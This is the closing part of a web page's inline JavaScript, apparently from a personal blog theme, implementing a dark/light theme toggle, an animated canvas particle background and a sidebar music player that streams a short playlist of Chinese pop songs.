  try { saved = localStorage.getItem(STORAGE_KEY); } catch (e) {}
  applyTheme(saved === 'light' ? 'light' : 'dark');

  document.getElementById('themeSwitchBtn').addEventListener('click', function () {
    var current = rootEl.getAttribute('data-theme') === 'light' ? 'dark' : 'light';
    applyTheme(current);
  });

  // ========== Canvas 连线粒子 ==========
  var canvas = document.getElementById('particles-canvas');
  var ctx = canvas.getContext('2d');
  var particles = [];
  var mouse = { x: null, y: null };
  var COUNT = 70;
  var LINK_DIST = 140;

  function resize() {
    canvas.width = window.innerWidth;
    canvas.height = window.innerHeight;
  }
  resize();
  window.addEventListener('resize', resize);

  function random(min, max) { return Math.random() * (max - min) + min; }

  function createParticles() {
    particles = [];
    for (var i = 0; i < COUNT; i++) {
      particles.push({
        x: Math.random() * canvas.width,
        y: Math.random() * canvas.height,
        vx: random(-0.5, 0.5),
        vy: random(-0.5, 0.5),
        r: random(1, 2.5)
      });
    }
  }
  createParticles();

  window.addEventListener('mousemove', function (e) {
    mouse.x = e.clientX;
    mouse.y = e.clientY;
  });
  window.addEventListener('mouseout', function () {
    mouse.x = null;
    mouse.y = null;
  });

  function draw() {
    ctx.clearRect(0, 0, canvas.width, canvas.height);
    var i, j, dx, dy, dist, alpha;
    for (i = 0; i < particles.length; i++) {
      for (j = i + 1; j < particles.length; j++) {
        dx = particles[i].x - particles[j].x;
        dy = particles[i].y - particles[j].y;
        dist = Math.sqrt(dx * dx + dy * dy);
        if (dist < LINK_DIST) {
          alpha = 1 - dist / LINK_DIST;
          ctx.strokeStyle = 'rgba(120, 200, 255, ' + (alpha * 0.5).toFixed(3) + ')';
          ctx.lineWidth = 1;
          ctx.beginPath();
          ctx.moveTo(particles[i].x, particles[i].y);
          ctx.lineTo(particles[j].x, particles[j].y);
          ctx.stroke();
        }
      }
    }
    if (mouse.x !== null) {
      for (i = 0; i < particles.length; i++) {
        dx = particles[i].x - mouse.x;
        dy = particles[i].y - mouse.y;
        dist = Math.sqrt(dx * dx + dy * dy);
        if (dist < LINK_DIST * 1.2) {
          alpha = 1 - dist / (LINK_DIST * 1.2);
          ctx.strokeStyle = 'rgba(255, 255, 255, ' + (alpha * 0.4).toFixed(3) + ')';
          ctx.lineWidth = 1;
          ctx.beginPath();
          ctx.moveTo(particles[i].x, particles[i].y);
          ctx.lineTo(mouse.x, mouse.y);
          ctx.stroke();
        }
      }
    }
    for (i = 0; i < particles.length; i++) {
      var p = particles[i];
      p.x += p.vx;
      p.y += p.vy;
      if (p.x < 0 || p.x > canvas.width) p.vx *= -1;
      if (p.y < 0 || p.y > canvas.height) p.vy *= -1;
      ctx.beginPath();
      ctx.arc(p.x, p.y, p.r, 0, Math.PI * 2);
      ctx.fillStyle = 'rgba(140, 210, 255, 0.85)';
      ctx.fill();
    }
    requestAnimationFrame(draw);
  }
  draw();

  // ========== 侧边栏音乐播放器 ==========
  // 歌单：在此添加或修改歌曲（名称 + 在线链接）
  var playlist = [
    { name: '晴天 - 周杰伦', url: 'https://music.163.com/song/media/outer/url?id=186016.mp3' },
    { name: '起风了 - 买辣椒也用券', url: 'https://music.163.com/song/media/outer/url?id=1330348068.mp3' },
    { name: '夜曲 - 周杰伦', url: 'https://music.163.com/song/media/outer/url?id=254574.mp3' },
    { name: '消愁 - 毛不易', url: 'https://music.163.com/song/media/outer/url?id=569213220.mp3' }
  ];

  var audio = document.getElementById('bgMusic');
  var currentIdx = 0;
  var isPlaying = false;

  function buildPlayer() {
    var sidebar = document.querySelector('.sidebar-inner');
    if (!sidebar) {
      setTimeout(buildPlayer, 500);
      return;
    }

    // 避免重复插入
    if (sidebar.querySelector('.music-widget')) return;

    var widget = document.createElement('div');
    widget.className = 'music-widget';
    widget.innerHTML =
      '<div class="music-title" id="musicTitle">点击播放音乐</div>' +
      '<div class="music-controls">' +
        '<button class="music-btn" id="musicPrev" title="上一首"><i class="fa fa-step-backward"></i></button>' +
        '<button class="music-btn" id="musicPlay" title="播放/暂停"><i class="fa fa-play"></i></button>' +
        '<button class="music-btn" id="musicNext" title="下一首"><i class="fa fa-step-forward"></i></button>' +
      '</div>' +
      '<div class="music-controls" style="margin-top:8px;">' +
        '<i class="fa fa-volume-down" style="font-size:11px;color:var(--text-color-3);"></i>' +
        '<input type="range" class="music-volume" id="musicVolume" min="0" max="100" value="50">' +
        '<i class="fa fa-volume-up" style="font-size:11px;color:var(--text-color-3);"></i>' +
      '</div>';
    sidebar.appendChild(widget);

    var btnPlay = document.getElementById('musicPlay');
    var btnPrev = document.getElementById('musicPrev');
    var btnNext = document.getElementById('musicNext');
    var volSlider = document.getElementById('musicVolume');
    var titleEl = document.getElementById('musicTitle');

    audio.volume = 0.5;

    btnPlay.addEventListener('click', function () {
      if (isPlaying) {
        audio.pause();
      } else {
        loadAndPlay(currentIdx);
      }
    });

    btnPrev.addEventListener('click', function () {
      currentIdx = (currentIdx - 1 + playlist.length) % playlist.length;
      loadAndPlay(currentIdx);
    });

    btnNext.addEventListener('click', function () {
      currentIdx = (currentIdx + 1) % playlist.length;
      loadAndPlay(currentIdx);
    });

    volSlider.addEventListener('input', function () {
      audio.volume = this.value / 100;
    });

    audio.addEventListener('ended', function () {
      currentIdx = (currentIdx + 1) % playlist.length;
      loadAndPlay(currentIdx);
    });

    audio.addEventListener('play', function () {
      isPlaying = true;
      btnPlay.classList.add('playing');
      btnPlay.innerHTML = '<i class="fa fa-pause"></i>';
    });

    audio.addEventListener('pause', function () {
      isPlaying = false;
      btnPlay.classList.remove('playing');
      btnPlay.innerHTML = '<i class="fa fa-play"></i>';
    });

    audio.addEventListener('error', function () {
      titleEl.textContent = '播放失败，尝试下一首...';
      setTimeout(function () {
        currentIdx = (currentIdx + 1) % playlist.length;
        loadAndPlay(currentIdx);
      }, 1500);
    });
  }

  function loadAndPlay(idx) {
    var titleEl = document.getElementById('musicTitle');
    if (titleEl) titleEl.textContent = playlist[idx].name;
    audio.src = playlist[idx].url;
    audio.load();
    var p = audio.play();
    if (p && p.catch) {
      p.catch(function () {
        if (titleEl) titleEl.textContent = '点击播放 — ' + playlist[idx].name;
      });
    }
  }

  if (document.readyState === 'complete') {
    buildPlayer();
  } else {
    window.addEventListener('load', buildPlayer);
  }
})();
</script>
</body>
</html>
